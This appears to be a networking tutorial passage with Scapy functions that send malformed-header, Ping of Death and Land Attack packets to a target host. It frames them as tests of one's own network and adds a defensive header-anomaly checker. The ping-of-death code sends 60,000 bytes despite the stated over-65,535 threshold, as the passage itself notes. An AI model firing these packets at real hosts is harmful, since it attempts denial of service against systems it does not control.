Common attacks

In this example, let's look at how we can construct our packets to conduct some of the classic attacks, such as Ping of Death (https://en.wikipedia.org/wiki/Ping_of_death) and Land Attack (https://en.wikipedia.org/wiki/Denial-of-service_attack). These are perhaps the kind of network penetration tests that you previously had to pay for with commercial software. With Scapy, you can conduct the tests while maintaining full control, and you can add more tests in the future.

The first attack sends the destination host a packet with a bogus IP header, here a header length (ihl) of 2 and an IP version of 3:

from scapy.all import IP, ICMP, TCP, fragment, send

def malformed_packet_attack(host):
    send(IP(dst=host, ihl=2, version=3)/ICMP())

A Ping of Death consists of a regular ICMP packet with a payload bigger than 65,535 bytes. The ping_of_death_attack function below sends a fragmented ICMP packet carrying a 60,000-byte payload:

def ping_of_death_attack(host):
    # https://en.wikipedia.org/wiki/Ping_of_death
    send(fragment(IP(dst=host)/ICMP()/("X"*60000)))

The land_attack sets both the source and the destination address to the target host, so the host's response is directed back to itself, which exhausts the host's resources:

def land_attack(host):
    # https://en.wikipedia.org/wiki/Denial-of-service_attack
    send(IP(src=host, dst=host)/TCP(sport=135,dport=135))

These are pretty old vulnerabilities, or classic attacks, that modern operating systems are no longer susceptible to. For our Ubuntu 14.04 host, none of the preceding attacks will bring it down. However, as more security issues are discovered, Scapy is a great tool for starting tests against our own network and hosts without having to wait for the impacted vendor to give us a validation tool. This is especially true for zero-day (published without prior notification) attacks, which seem to be more and more common on the internet.
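The header anomalies that the three packets above rely on can also be checked on the receiving side. The following is an added example, not code from the book: it parses a raw IPv4 header with the standard library only and reports a bad version or header length, identical source and destination addresses, and a fragment that would reassemble past 65,535 bytes. The function names, the sample headers, and the 192.0.2.x documentation addresses are constructed for illustration.

```python
import socket
import struct

MAX_IP_DATAGRAM = 65535  # largest size the 16-bit total-length field allows


def build_header(version=4, ihl=5, total_len=84, frag_units=0,
                 src="192.0.2.10", dst="192.0.2.20"):
    """Constructed 20-byte sample header (hypothetical helper, checksum 0)."""
    return struct.pack("!BBHHHBBH4s4s", (version << 4) | ihl, 0, total_len,
                       1, frag_units, 64, 1, 0,
                       socket.inet_aton(src), socket.inet_aton(dst))


def classify_ipv4_header(raw):
    """Return a list of anomalies found in a raw IPv4 header."""
    if len(raw) < 20:
        return ["truncated header"]
    (ver_ihl, _tos, total_len, _ident, flags_frag, _ttl, _proto, _csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    version, ihl = ver_ihl >> 4, ver_ihl & 0x0F
    findings = []
    if version != 4:
        findings.append("bad version %d" % version)
    if ihl < 5:  # a valid header is at least five 32-bit words
        findings.append("bad ihl %d" % ihl)
    if src == dst:
        findings.append("land: src == dst (%s)" % socket.inet_ntoa(src))
    # The fragment offset counts 8-byte units. A fragment whose data would
    # end beyond 65,535 bytes cannot belong to a valid datagram.
    end = (flags_frag & 0x1FFF) * 8 + total_len
    if end > MAX_IP_DATAGRAM:
        findings.append("oversized reassembly %d" % end)
    return findings


if __name__ == "__main__":
    samples = {
        "normal": build_header(),
        "malformed": build_header(version=3, ihl=2),
        "land": build_header(src="192.0.2.20", dst="192.0.2.20"),
        "oversized": build_header(total_len=1500, frag_units=8100),
    }
    for name, raw in samples.items():
        print(name, classify_ipv4_header(raw))
```

The last fragment of the 60,000-byte payload used in ping_of_death_attack ends at 60,028 bytes, so it is not flagged by the oversized check.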
